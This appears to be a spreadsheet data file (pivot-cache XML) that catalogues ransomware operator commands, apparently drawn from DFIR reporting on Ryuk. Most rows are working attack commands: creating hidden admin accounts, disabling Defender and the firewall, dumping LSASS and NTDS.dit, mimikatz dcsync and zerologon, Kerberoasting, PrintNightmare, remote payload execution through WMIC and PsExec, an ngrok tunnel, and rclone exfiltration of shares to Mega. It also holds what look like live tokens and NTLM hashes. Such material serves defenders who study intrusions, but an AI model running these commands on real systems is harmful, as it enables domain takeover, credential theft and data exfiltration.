        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quo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cmdline"/>
    <s v="shell SCHTASKS /s ip\hostname /RU &quot;SYSTEM&quot; /create /tn &quot;WindowsSensor15&quot; /tr &quot;cmd.exe /c C:\ProgramData\P32.exe&quot; /sc ONCE /sd 01/01/1970 /st 00:00"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell SCHTASKS /s ip\hostname /run /TN &quot;WindowsSensor15&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell schtasks /S ip\hostname /TN &quot;WindowsSensor15&quot; /DELETE /F"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="3"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user Admin Password1 /add"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="4"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup Administrators Admin /add"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="5"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user oldadministrator &quot;qc69t4B#Z0kE3&quot; /add"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="6"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup Administrators oldadministrator /ADD"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="7"/>
    <x v="2"/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist&quot; /v oldadministrator /t REG_DWORD /d 0 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="8"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="gmer.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="9"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="pchunter"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="10"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="PowerTool/64"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="11"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="delete DsMpEng.dll"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="12"/>
    <x v="3"/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="13"/>
    <x v="2"/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="14"/>
    <x v="2"/>
    <s v="cmdline"/>
    <s v="Set-ItemProperty -Path &quot;HKLM:\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp&quot; -Name PortNumber -Value 1350"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="15"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="NetSh Advfirewall set allprofiles state off"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="16"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule group=&quot;remote desktop&quot; new enable=Yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="17"/>
    <x v="4"/>
    <s v="cmdline"/>
    <s v="netsh firewall set service type =remotedesktop mode=enable"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="18"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="19"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="New-NetFirewallRule -DisplayName &quot;New RDP Port 1350&quot; -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="20"/>
    <x v="5"/>
    <s v="cmdline"/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="21"/>
    <x v="6"/>
    <s v="cmdline"/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create&quot;cmd /c copy \?_x000a_\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?_x000a_\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp;copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="22"/>
    <x v="7"/>
    <s v="cmdline"/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="23"/>
    <x v="8"/>
    <s v="cmdline"/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="24"/>
    <x v="9"/>
    <s v="cmdline"/>
    <s v="rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="25"/>
    <x v="10"/>
    <s v="cmdline"/>
    <s v="wmic /node:[target] process call create &quot;cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="26"/>
    <x v="9"/>
    <s v="cmdline"/>
    <s v="remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (Cobalt Strike command)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="27"/>
    <x v="11"/>
    <s v="generic"/>
    <s v="Dump using GUI while TA is on RDP_x000a_taskmgr_x000a_Open taskmgr_x000a_Go to process lsass_x000a_“Create Dump File”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="28"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="privilege::debug"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="29"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="30"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="31"/>
    <x v="13"/>
    <s v="cmdline"/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="32"/>
    <x v="13"/>
    <s v="cmdline"/>
    <s v="psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1, Welcome1, 1qazXDR% +&quot; -LockoutThreshold 5"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="33"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="RouterScan.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="34"/>
    <x v="14"/>
    <s v="cmdline"/>
    <s v="netscan.exe /hide /auto:&quot;result.xml&quot; /config:netscan.xml /range:192.168.0.1-192.168.1.255"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="35"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="36"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="powershell Get-DomainController"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="37"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="38"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="powershell get-adcomputer -filter * | select -expand name"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="39"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:&quot;NameDomain&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="40"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="41"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="42"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="43"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell Get-NetSubnet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="44"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="45"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="7za.exe a -tzip -mx5 \DC01\C$\temp\log.zip\DC01\C$\temp\log -pTOPSECRETPASSWORD"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="46"/>
    <x v="18"/>
    <s v="script"/>
    <s v="{_x000a_mkdir &quot;C:\ProgramData\AnyDesk&quot;_x000a_# Download AnyDesk_x000a_$clnt = new-object System.Net.WebClient_x000a_$url = &quot;http://download.anydesk.com/AnyDesk.exe&quot;_x000a_$file = &quot;C:\ProgramData\AnyDesk.exe&quot;_x000a_$clnt.DownloadFile($url,$file)cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silentcmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password_x000a_net user oldadministrator &quot;qc69t4B#Z0kE3&quot;/add_x000a_net localgroup Administrators oldadministrator /ADD_x000a_reg add&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist&quot; /v oldadministrator /t REG_DWORD /d 0 /f_x000a_cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id_x000a_}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="47"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="rclone.exe copy &quot;\envisionpharma.com\IT\KLSHARE&quot; Mega:Finanse -q --ignore-existing  --auto-confirm --multi-thread-streams 12 --transfers 12"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="48"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="rclone.exe copy &quot;\PETERLENOVO.wist.local\Users&quot; ftp1:uploads/Users/ -q --ignore-existing  --auto-confirm --multi-thread-streams 3 --transfers 3"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="49"/>
    <x v="0"/>
    <s v="script"/>
    <s v="#!/bin/bash_x000a_OUTPATH=&quot;sorted&quot;_x000a_F1INPATH=&quot;ad_computers.txt&quot;_x000a_F2INPATH=&quot;ad_users.txt&quot;_x000a_F2OUTPATH=&quot;ad_users_result.txt&quot;_x000a_mkdir &quot;$OUTPATH&quot;_x000a_while read p; do_x000a_if [[ ${p:0:17} == &quot;&gt;operatingSystem:&quot; ]];_x000a_then_x000a_OSPATH=${p:18}_x000a_fi_x000a_if [[ ${p:0:13} == &quot;&gt;dNSHostName:&quot; ]]; then_x000a_if [[ ${OSPATH:0:14} == &quot;Windows Server&quot;_x000a_]]; then_x000a_echo ${p:14} &gt;&gt; &quot;$OUTPATH/SERVERS.txt&quot;_x000a_tmp=$(echo &quot;$OSPATH&quot; | cut -d' ' -f1-3)_x000a_echo ${p:14} &gt;&gt; &quot;$OUTPATH/$tmp.txt&quot;_x000a_else_x000a_echo ${p:14} &gt;&gt; &quot;$OUTPATH/WORKERS.txt&quot;_x000a_tmp=$(echo &quot;$OSPATH&quot; | cut -d' ' -f1-2)_x000a_echo ${p:14} &gt;&gt; &quot;$OUTPATH/$tmp.txt&quot;_x000a_fi_x000a_fi_x000a_done &lt; $F1INPATH_x000a_while read p; do_x000a_if [[ ${p:0:13} == &quot;&gt;description:&quot; ]]; then_x000a_DECR=${p:14}_x000a_DECR=${DECR%$'\r'}_x000a_fi_x000a_if [[ ${p:0:16} == &quot;&gt;sAMAccountName:&quot; ]];_x000a_then_x000a_ACCNAME=${p:17}_x000a_ACCNAME=${ACCNAME%$'\r'}_x000a_echo &quot;$ACCNAME:$DECR&quot; &gt;&gt; &quot;$OUTPATH_x000a_/$F2OUTPATH&quot;_x000a_fi_x000a_done &lt; $F2INPATH"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Use of Cobalt Strike SHELL to execute variety of commands while exploitation. "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="51"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot;process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="52"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:10.28.0.3 process call create &quot;C:\ProgramData\j1.exe&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="53"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:172.16.0.36 process call create &quot;rundll32.exe C:\ProgramData\p64.dll StartW&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="54"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="55"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:&quot;PC NAME&quot; process call create &quot;COMMAND TO BE EXECUTED&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="56"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; &gt; ad_users.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="57"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; &gt; ad_ous.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="58"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="59"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot; &gt; ad_group.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="60"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="61"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; &gt; ad_computers.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="62"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)&gt; subnets.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="63"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 (Cobalt Strike command)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="64"/>
    <x v="16"/>
    <s v="htool"/>
    <s v="PowerView.ps1"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="65"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="66"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Invoke-UserHunter"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="67"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="68"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt (Cobalt Strike command)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="69"/>
    <x v="21"/>
    <s v="cmdline"/>
    <s v="ngrok authtoken1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="70"/>
    <x v="21"/>
    <s v="cmdline"/>
    <s v="ngrok tcp 3389"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="71"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY &quot;\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe&quot; &quot;C:\windows\temp&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="72"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="73"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="curl -o setup.msi &quot;http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&amp;integratorLogin=REDACTED%40protonmail.com&quot; &amp;&amp; msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="74"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="75"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="MSBuild Install Atera Agent "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="76"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="77"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="net domain_controllers"/>
    <s v="not a valid command "/>
    <x v="1"/>
  </r>
  <r>
    <x v="78"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="shell net localgroup administrators"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="79"/>
    <x v="23"/>
    <s v="cmdline"/>
    <s v="shell whoami"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="80"/>
    <x v="23"/>
    <s v="cmdline"/>
    <s v="shell whoami /groups"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="81"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="shell net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="82"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="shell net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="83"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net computers"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="84"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="powershell-import /home/user/work/ShareFinder.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="85"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out- File -Encoding ascii C:\ProgramData\sh.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="86"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="87"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="powershell-import /home/user/work/Invoke-Kerberoast.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="88"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force - Encoding UTF8"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="89"/>
    <x v="24"/>
    <s v="cmdline"/>
    <s v="execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="90"/>
    <x v="24"/>
    <s v="cmdline"/>
    <s v="execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="91"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="log nameoflog.log"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="92"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="privilege::debug_x000a_"/>
    <s v="mimikatz commands"/>
    <x v="1"/>
  </r>
  <r>
    <x v="93"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="lsadump::dcsync /user:Administrator"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="94"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="sekurlsa::pth /user: /domain: /ntlm: /run:cmd"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="95"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="getsystem_x000a_hashdump_x000a_logonpasswords"/>
    <s v="mimikatz in cobalt strike"/>
    <x v="1"/>
  </r>
  <r>
    <x v="96"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="beacon&gt; make_token domen\user password – impersonate user token_x000a_beacon&gt; pth domen\user NTLM - impersonate user token_x000a_beacon&gt; rev2self – revert session to default_x000a_beacon&gt; dcsync domain.com (Replace domain.com - with domain) - acquire all hashes from_x000a_domain (domain administrator token is required)"/>
    <s v="cobalt strike beacon"/>
    <x v="1"/>
  </r>
  <r>
    <x v="97"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="pth Domain\Admin pass (as hash) shell dir \\ip or hostname\c$ EliAdmin:1001:aad3b435b51404eeaad3b435b51404ee:b0059c57f5249ede3db768e388ee0b14:::_x000a_pth ELC\EliAdmin b0059c57f5249ede3db768e388ee0b14"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="98"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="make_token Domain\Admin Pass rev2self"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="99"/>
    <x v="25"/>
    <s v="cmdline"/>
    <s v="procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="100"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$/exploit"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="101"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="102"/>
    <x v="26"/>
    <s v="cmdline"/>
    <s v="shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="103"/>
    <x v="9"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:[target] process call create &quot;cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="104"/>
    <x v="11"/>
    <m/>
    <s v="C:\ProgramData\lsass.dmp full&quot; remote-exec psexec [target] cmd /c rundll32.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="105"/>
    <x v="13"/>
    <s v="cmdline"/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1,"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="106"/>
    <x v="27"/>
    <s v="cmdline"/>
    <s v="powershell Invoke-Nightmare -NewUser &quot;HACKER&quot; -NewPassword &quot;FUCKER&quot; -DriverName &quot;Xeroxxx&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="107"/>
    <x v="27"/>
    <m/>
    <s v="powershell-import //import file CVE-2021-34527.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="108"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user OldAdmin 1Q2w3E4r5T6y /add"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="109"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup Administrators OldAdmin /ADD"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="110"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="https://github.com/rsmudge/ZeroLogon-BOF"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="111"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="dcsync domain.local"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="112"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell AGENT_INSTALLER.msi"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="113"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="shell nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="114"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="115"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net start Volume Shadow Copy"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="116"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="117"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NT DS.dit c:\temp\log\ &amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp; copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="118"/>
    <x v="7"/>
    <s v="cmdline"/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="119"/>
    <x v="14"/>
    <s v="cmdline"/>
    <s v="C:\programdata\netscan"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="120"/>
    <x v="14"/>
    <s v="cmdline"/>
